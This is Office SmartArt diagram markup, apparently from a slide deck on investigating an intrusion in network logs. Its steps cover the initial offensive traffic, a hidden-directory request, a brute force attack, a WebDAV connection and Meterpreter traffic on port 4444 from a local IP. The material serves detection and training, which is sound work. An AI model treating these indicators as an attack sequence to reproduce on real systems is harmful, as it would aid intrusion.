    <dgm:cxn modelId="{D60235FD-3731-4157-B34C-335F27DE69EA}" type="presOf" srcId="{B75B0DA3-A9DC-48C4-96BE-1937703B0156}" destId="{BDE55A3D-0CD0-4C04-B6D9-145AB3505FFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0E9ADCB8-063E-415D-B92B-4096FAB371CE}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{C90C4630-E365-428B-84EB-78CA73546584}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E8BB2FF4-E811-4CA1-B79F-3F5C1F833601}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{7D10F827-ABE2-4707-A002-601D93FA58DC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CF40F362-A163-4323-8014-D7E96276F11F}" type="presParOf" srcId="{7D10F827-ABE2-4707-A002-601D93FA58DC}" destId="{B8F5F184-20E5-44DF-B99F-95404369E9FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{23982305-12C3-43C3-8B49-0BA6164700E6}" type="presParOf" srcId="{7D10F827-ABE2-4707-A002-601D93FA58DC}" destId="{DF8B03A3-33E4-426B-AF90-02F860D70AAB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BAE47B3A-D690-4727-BEDE-7DE081A7481D}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{ADC94420-F6CD-486E-BE34-9167D6217C71}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8143B8CD-3401-4CDE-8ACB-5ADA40ED3147}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{6F389B32-61A2-4AD3-96FC-0A1F15E9B55C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8A30FF3E-6AFF-4154-B6CA-9AE7DDBC9009}" type="presParOf" srcId="{6F389B32-61A2-4AD3-96FC-0A1F15E9B55C}" destId="{BDE55A3D-0CD0-4C04-B6D9-145AB3505FFD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{23A53814-694B-40B8-8E8D-97D9E171C62C}" type="presParOf" srcId="{6F389B32-61A2-4AD3-96FC-0A1F15E9B55C}" destId="{19409569-B31C-4467-AA8B-1CD64A9B7FD8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D3CADD52-11E0-4B58-B359-82ABF73BDEB9}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{A025D881-9505-4059-ACAF-A2DE774A722E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DF80CD63-5678-427E-81B9-0CBDB25E2FF4}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{A90B99EB-D8D9-42A0-9CCB-494CC1720124}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{55FC4BDF-0C84-4376-B8F2-97902BF6C702}" type="presParOf" srcId="{A90B99EB-D8D9-42A0-9CCB-494CC1720124}" destId="{6D1F8E8C-A927-4315-9E73-90428D660C69}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{885033C5-1016-4E5B-9A16-ECE3BE9D3465}" type="presParOf" srcId="{A90B99EB-D8D9-42A0-9CCB-494CC1720124}" destId="{23ADEDE8-2BEE-4071-B7DD-F583951ADEF6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4C9FF128-9415-4FB2-98AF-FE8548F2D841}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{0BF56476-60E6-4982-AD34-D5E50FCDF9E3}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F6916462-A5C2-42DE-89E0-F70B341F08FA}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{592916C3-FB54-4E62-B74B-B6892BB68894}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9B5CBA8E-E246-4A14-8FB1-041171854F51}" type="presParOf" srcId="{592916C3-FB54-4E62-B74B-B6892BB68894}" destId="{1E5BD107-29B5-4CF7-B252-35D37DC982B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EC17D0D1-4A13-42CB-9861-09C4492F0342}" type="presParOf" srcId="{592916C3-FB54-4E62-B74B-B6892BB68894}" destId="{3CD35C0B-0BFE-4C85-9D36-2DEEE0F3041D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6F529ED0-6B22-4BD7-98F7-60688BF69842}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{E572E846-9D11-4650-8FAD-20FE17BDE2AB}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{1DE8B575-1EB8-4109-890E-0A93F6909480}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{C73E9E6E-5E76-4569-AA79-A9A3DCAEE577}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{326B78D6-B39F-4CD3-828A-504BFB9ACB9F}" type="presParOf" srcId="{C73E9E6E-5E76-4569-AA79-A9A3DCAEE577}" destId="{4F9BA28B-3190-4F11-99F6-9673DC774612}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{617A9905-286E-4903-859F-E024DB886C71}" type="presParOf" srcId="{C73E9E6E-5E76-4569-AA79-A9A3DCAEE577}" destId="{1FD028EB-4AA8-4222-9843-7E8DF8B9486C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CBCC21BC-6BA9-4799-BE67-37841B48740A}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{0BBC5869-F625-44D2-AB73-7DB8E1D7A89D}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{ACCA6428-CE1E-4ADD-A5F3-63AD8258CA4A}" type="presParOf" srcId="{EBFBC49A-2BC9-4029-8C05-C87E566AC278}" destId="{B0111E0D-F8B3-46A0-9444-CF67096803B7}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8FD3563F-163A-4E64-8E3D-5933C7BDE3BB}" type="presParOf" srcId="{B0111E0D-F8B3-46A0-9444-CF67096803B7}" destId="{3FE8545E-34B7-46B9-9AA2-AEB06D8951EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{5E17B286-8C4B-4C15-8624-E3F86BCCCF9D}" type="presParOf" srcId="{B0111E0D-F8B3-46A0-9444-CF67096803B7}" destId="{5BD58436-3C67-43A6-97B7-C2C3BBA19D9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98090D1-62AC-4CC5-8551-0CD20637618F}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D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52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Identify the initial offensive traffic </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFEFCC6D-C123-4C25-A6B9-0551661B3D11}" type="parTrans" cxnId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}" type="sibTrans" cxnId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>  Find the request for the hidden directory </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F1BFA5C-E8C3-41D4-8257-97E03AFD5D37}" type="parTrans" cxnId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4587CD84-8CDF-4B8A-AF09-948DE0759811}" type="sibTrans" cxnId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C369621-6DA8-482A-9A0E-2B7FD368C646}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Identify the brute force attack</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CFE73A2-0173-458F-BA3D-2B2CF08479B2}" type="parTrans" cxnId="{152DAE3A-6DD3-4EAC-841C-A41ECD49A2C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{401EE494-355D-49C5-9E10-516214095594}" type="sibTrans" cxnId="{152DAE3A-6DD3-4EAC-841C-A41ECD49A2C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CA57057-D083-4B35-A2AC-2056D540A5F8}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Find the webdav connection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBF4FBF2-2A5F-4B31-AA29-4ADA841BED6A}" type="parTrans" cxnId="{3CB7CBB7-5097-452C-ADFE-97415F5B140E}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2A76334-28CD-4687-BA48-C4A8504859B4}" type="sibTrans" cxnId="{3CB7CBB7-5097-452C-ADFE-97415F5B140E}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9DE43EB-3377-4D79-8563-E0643E69ED90}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> Identify the meterpreter traffic</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6298A71-5F98-4503-B121-EE71EF906972}" type="parTrans" cxnId="{3DB6EF8D-84F5-40E2-8FAF-BBC3FC908929}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0F4E573B-227E-497E-AB6A-3D610C0B5276}" type="sibTrans" cxnId="{3DB6EF8D-84F5-40E2-8FAF-BBC3FC908929}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{311065C5-C7C0-43F4-8144-456E680D03E2}" type="pres">
      <dgm:prSet presAssocID="{398090D1-62AC-4CC5-8551-0CD20637618F}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" type="pres">
      <dgm:prSet presAssocID="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E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CD002B5-AC36-4ED2-AD33-72653509322D}" type="pres">
      <dgm:prSet presAssocID="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" type="pres">
      <dgm:prSet presAssocID="{586B2209-4AA5-4065-B0B1-54919DBACC8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E2E5D78-904F-4E84-975F-B0876B3F5CA2}" type="pres">
      <dgm:prSet presAssocID="{4587CD84-8CDF-4B8A-AF09-948DE0759811}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}" type="pres">
      <dgm:prSet presAssocID="{4C369621-6DA8-482A-9A0E-2B7FD368C64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0B4F510-4D8A-4679-B815-9F6F3D6B9A94}" type="pres">
      <dgm:prSet presAssocID="{401EE494-355D-49C5-9E10-516214095594}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{512D50A6-3596-4293-AD12-2EB674231B42}" type="pres">
      <dgm:prSet presAssocID="{9CA57057-D083-4B35-A2AC-2056D540A5F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C7B9603-9BDA-41A7-B967-DCCC64B6D291}" type="pres">
      <dgm:prSet presAssocID="{A2A76334-28CD-4687-BA48-C4A8504859B4}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74A336DF-98A3-471E-A724-5BB8C35806C4}" type="pres">
      <dgm:prSet presAssocID="{A9DE43EB-3377-4D79-8563-E0643E69ED90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DD55002-E983-4268-9BAB-0DB66DE2B0D3}" type="presOf" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{311065C5-C7C0-43F4-8144-456E680D03E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}" srcOrd="0" destOrd="0" parTransId="{CFEFCC6D-C123-4C25-A6B9-0551661B3D11}" sibTransId="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}"/>
    <dgm:cxn modelId="{15D23A10-5D77-49EE-8582-96AA49D51254}" type="presOf" srcId="{9CA57057-D083-4B35-A2AC-2056D540A5F8}" destId="{512D50A6-3596-4293-AD12-2EB674231B42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}" srcOrd="1" destOrd="0" parTransId="{3F1BFA5C-E8C3-41D4-8257-97E03AFD5D37}" sibTransId="{4587CD84-8CDF-4B8A-AF09-948DE0759811}"/>
    <dgm:cxn modelId="{74C84023-77E1-4842-9912-BBA36F0AA399}" type="presOf" srcId="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}" destId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{152DAE3A-6DD3-4EAC-841C-A41ECD49A2C8}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{4C369621-6DA8-482A-9A0E-2B7FD368C646}" srcOrd="2" destOrd="0" parTransId="{8CFE73A2-0173-458F-BA3D-2B2CF08479B2}" sibTransId="{401EE494-355D-49C5-9E10-516214095594}"/>
    <dgm:cxn modelId="{F5389953-EC37-48F1-96D2-6F0A799760B9}" type="presOf" srcId="{A9DE43EB-3377-4D79-8563-E0643E69ED90}" destId="{74A336DF-98A3-471E-A724-5BB8C35806C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{77ACB955-EA19-4C1F-942E-0878DCDF61CA}" type="presOf" srcId="{4C369621-6DA8-482A-9A0E-2B7FD368C646}" destId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3DB6EF8D-84F5-40E2-8FAF-BBC3FC908929}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{A9DE43EB-3377-4D79-8563-E0643E69ED90}" srcOrd="4" destOrd="0" parTransId="{B6298A71-5F98-4503-B121-EE71EF906972}" sibTransId="{0F4E573B-227E-497E-AB6A-3D610C0B5276}"/>
    <dgm:cxn modelId="{3CB7CBB7-5097-452C-ADFE-97415F5B140E}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{9CA57057-D083-4B35-A2AC-2056D540A5F8}" srcOrd="3" destOrd="0" parTransId="{CBF4FBF2-2A5F-4B31-AA29-4ADA841BED6A}" sibTransId="{A2A76334-28CD-4687-BA48-C4A8504859B4}"/>
    <dgm:cxn modelId="{656E5EFB-7074-4B30-AEC8-EB858C8CA4E9}" type="presOf" srcId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}" destId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F3DCBF83-D586-4C79-937A-0DD6A840C031}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9F737322-94DB-4FE4-9744-8593AA2E6458}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{BCD002B5-AC36-4ED2-AD33-72653509322D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47225059-E07F-4780-B0C0-FADE6FDE7641}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DD979699-00AE-43E0-9391-AE60AD14B610}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{0E2E5D78-904F-4E84-975F-B0876B3F5CA2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EB74D4C5-EBE6-4E97-88AC-1A612A2A0790}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3ECAB714-F6FF-4792-B75A-4B4F54D8AEDD}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{10B4F510-4D8A-4679-B815-9F6F3D6B9A94}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{248E571D-9A8A-489F-B84F-9FE138B100CE}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{512D50A6-3596-4293-AD12-2EB674231B42}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5C44DBBB-278D-45EE-B065-8C94766CFAA2}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{CC7B9603-9BDA-41A7-B967-DCCC64B6D291}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{51991CE6-4170-4FB8-B4B8-0E45221851A4}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{74A336DF-98A3-471E-A724-5BB8C35806C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DC7A43E-5292-4D7F-BEC1-2D212798801C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default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8F89EBA4-4482-400F-B1A8-EE669631F6D6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>
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>source.ip : 192.168.1.105 </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{454F0BF5-4665-46D3-9D54-F77211BA9D19}" type="parTrans" cxnId="{74526EDF-A464-48C6-A6BF-5274ECA373AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E74C2B8-3C22-4534-AD5B-6D45FC368C0B}" type="sibTrans" cxnId="{74526EDF-A464-48C6-A6BF-5274ECA373AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11F89128-D1A4-425C-9B18-102F6C39EE2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err="1">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t>destination.port</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro"/>
            </a:rPr>
            <a:t> : 4444</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{043036E5-7F6F-4E3A-AEAA-A12DD7373715}" type="parTrans" cxnId="{FEDA7B71-F522-485F-AB13-D2D67058B532}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DADE13E-282F-430C-86BE-06B1A0AB3340}" type="sibTrans" cxnId="{FEDA7B71-F522-485F-AB13-D2D67058B532}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36404FB9-F461-4EEC-8B5E-97087FCF984D}" type="pres">
      <dgm:prSet presAssocID="{7DC7A43E-5292-4D7F-BEC1-2D212798801C}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DD505FE2-C851-4343-AB8B-B52CCDCB8E34}" type="pres">
      <dgm:prSet presAssocID="{8F89EBA4-4482-400F-B1A8-EE669631F6D6}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{43CA559E-18DF-4E51-B71D-B594473C8AB8}" type="pres">
      <dgm:prSet presAssocID="{9E74C2B8-3C22-4534-AD5B-6D45FC368C0B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DBB1D68D-2F38-4D7F-B541-EF7CC38372FE}" type="pres">
      <dgm:prSet presAssocID="{11F89128-D1A4-425C-9B18-102F6C39EE24}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2" custLinFactNeighborX="3123" custLinFactNeighborY="-700">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{FEDA7B71-F522-485F-AB13-D2D67058B532}" srcId="{7DC7A43E-5292-4D7F-BEC1-2D212798801C}" destId="{11F89128-D1A4-425C-9B18-102F6C39EE24}" srcOrd="1" destOrd="0" parTransId="{043036E5-7F6F-4E3A-AEAA-A12DD7373715}" sibTransId="{2DADE13E-282F-430C-86BE-06B1A0AB3340}"/>
    <dgm:cxn modelId="{CC139D74-6703-4A15-8312-2619976FFBFC}" type="presOf" srcId="{11F89128-D1A4-425C-9B18-102F6C39EE24}" destId="{DBB1D68D-2F38-4D7F-B541-EF7CC38372FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{74526EDF-A464-48C6-A6BF-5274ECA373AD}" srcId="{7DC7A43E-5292-4D7F-BEC1-2D212798801C}" destId="{8F89EBA4-4482-400F-B1A8-EE669631F6D6}" srcOrd="0" destOrd="0" parTransId="{454F0BF5-4665-46D3-9D54-F77211BA9D19}" sibTransId="{9E74C2B8-3C22-4534-AD5B-6D45FC368C0B}"/>
    <dgm:cxn modelId="{E1608FED-27A2-429E-9DD1-1104451B2AD5}" type="presOf" srcId="{8F89EBA4-4482-400F-B1A8-EE669631F6D6}" destId="{DD505FE2-C851-4343-AB8B-B52CCDCB8E34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{18FAA8FE-741F-4D5F-AE38-D15A63BE8B91}" type="presOf" srcId="{7DC7A43E-5292-4D7F-BEC1-2D212798801C}" destId="{36404FB9-F461-4EEC-8B5E-97087FCF984D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D4FF2E0D-B1B5-45AA-B7B3-F86259027ACB}" type="presParOf" srcId="{36404FB9-F461-4EEC-8B5E-97087FCF984D}" destId="{DD505FE2-C851-4343-AB8B-B52CCDCB8E34}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{5EAE387C-DE84-48AB-82CF-843A4779780A}" type="presParOf" srcId="{36404FB9-F461-4EEC-8B5E-97087FCF984D}" destId="{43CA559E-18DF-4E51-B71D-B594473C8AB8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3176A0A2-FF67-4284-A740-3EE853C8BBF7}" type="presParOf" srcId="{36404FB9-F461-4EEC-8B5E-97087FCF984D}" destId="{DBB1D68D-2F38-4D7F-B541-EF7CC38372FE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
  </dgm:cxnLst>
  <dgm:bg>
    <a:solidFill>
      <a:schemeClr val="tx1">
        <a:lumMod val="50000"/>
        <a:lumOff val="50000"/>
